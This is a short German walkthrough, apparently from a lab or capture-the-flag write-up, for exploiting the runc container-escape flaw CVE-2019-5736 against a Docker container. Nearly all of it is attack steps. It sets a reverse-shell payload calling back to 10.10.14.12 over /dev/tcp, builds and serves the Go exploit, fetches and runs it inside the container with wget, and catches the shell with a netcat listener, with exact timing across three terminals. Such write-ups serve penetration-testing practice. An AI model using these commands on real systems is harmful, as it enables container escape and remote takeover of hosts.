
Go-basierter Exploit für CVE-2019-5736 (Runc-Container-Escape) mit anpassbarer Reverse-Shell-Payload, entwickelt für Penetrationstests und Red-Team-Operationen gegen verwundbare Docker-Container.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
Die Maschine ist anfällig für CVE-2019-5736, befolgen Sie die Schritte im Runc-Exploit (CVE-2019-5736). Laden Sie die Datei main.go herunter, ändern Sie die Payload in der Datei zu:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
Danach führen Sie aus:
go build main.go
Hoste einen HTTP-Server :
python3 -m http.server

Öffnen Sie dann wie unten gezeigt 3 Terminals :

Terminal 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Terminal 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Terminal 3
nc -nlvp 1234
Sobald Sie ./main im ersten SSH-Terminal ausführen, führen Sie sofort den zweiten Befehl im zweiten SSH-Terminal aus. Dann erhalten Sie die Netcat-Reverse-Shell im Terminal 3

